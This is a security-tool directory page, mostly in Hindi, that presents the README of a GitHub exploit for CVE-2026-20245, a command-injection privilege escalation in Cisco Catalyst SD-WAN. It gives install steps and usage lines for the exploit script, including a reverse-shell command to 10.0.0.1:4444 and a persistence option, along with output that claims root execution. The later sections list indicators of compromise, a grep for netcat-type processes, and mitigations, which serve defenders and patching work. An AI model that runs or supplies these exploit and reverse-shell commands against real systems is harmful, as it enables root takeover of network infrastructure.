Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।**

रिपॉजिटरी देखें
343 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-20245 - Cisco SD-WAN विशेषाधिकार वृद्धि शोषण

Security Rating CVSS CISA KEV

⚠️ चेतावनी

यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षणों के लिए है।

📋 विवरण

CVE-2026-20245 Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage), और Cisco Catalyst SD-WAN Validator (vBond) की CLI में एक विशेषाधिकार वृद्धि भेद्यता है। एक प्रमाणित हमलावर netadmin विशेषाधिकारों के साथ एक विशेष रूप से डिज़ाइन की गई फ़ाइल अपलोड करके root के रूप में मनमाने कमांड निष्पादित कर सकता है।

तकनीकी विवरण

क्षेत्रमान
CVECVE-2026-20245
CVSS7.8 (High)
VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
घटकCLI / CSV Upload
प्रकारCommand Injection (CWE-116)

🎯 प्रभावित संस्करण

उत्पादकमजोर संस्करण
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

विशिष्ट कमजोर संस्करण:

  • 20.9.x (सभी)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 स्थापना

root@kitploit:~
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Instalar dependencias
pip install -r requirements.txt

# Dar permisos
chmod +x exploit.py

📦 निर्भरताएँ txt requests>=2.31.0

root@kitploit:~
## 🚀 उपयोग

### संस्करण जांचें
```bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only

कमांड निष्पादित करें

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"

रिवर्स शेल

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

स्थायित्व स्थापित करें

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist

🔍 अपेक्षित आउटपुट

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================

🔍 समझौता संकेतक (IOCs)

लॉग में जांचें (/var/log/scripts.log)

root@kitploit:~
# खोजने के लिए विशिष्ट कमांड
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# विशिष्ट प्रविष्टियाँ:
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv

संदिग्ध फ़ाइलें

  • /home/admin/*.csv (अनधिकृत CSV फ़ाइलें)
  • /tmp/*.csv
  • /var/log/scripts.log असामान्य प्रविष्टियों के साथ

प्रक्रियाएँ

root@kitploit:~
# असामान्य root प्रक्रियाएँ खोजें
ps aux | grep -E "bash|sh|nc|ncat|socat"

🛡️ शमन

विकल्प 1 - निश्चित संस्करण में अपडेट करें (अनुशंसित)

संस्करणनिश्चित रिलीज़
20.18.2.1 और पिछले20.18.3.1

विकल्प 2 - पहुंच सीमित करें

  • प्रबंधन नेटवर्क तक प्रशासनिक पहुंच प्रतिबंधित करें
  • बहु-कारक प्रमाणीकरण का उपयोग करें
  • CSV अपलोड गतिविधि की निगरानी करें

विकल्प 3 - सुरक्षित कॉन्फ़िगरेशन

root@kitploit:~
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers

# Limitar privilegios netadmin
admin privilege restrict

📚 संदर्भ

  • Cisco सुरक्षा सलाह
  • NVD - CVE-2026-20245
  • CISA KEV कैटलॉग

📊 समयरेखा

तारीखघटना
2026-05-14Cisco प्रारंभिक सलाह प्रकाशित करता है
2026-06-04CVE आधिकारिक रूप से प्रकाशित
2026-06-09CISA KEV में जोड़ता है
2026-06-23पैच लगाने की CISA की अंतिम तिथि

⚖️ अस्वीकरण

यह सॉफ्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी गारंटी के। लेखक दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग केवल अधिकृत सिस्टम पर करें।

टूल डाउनलोड करें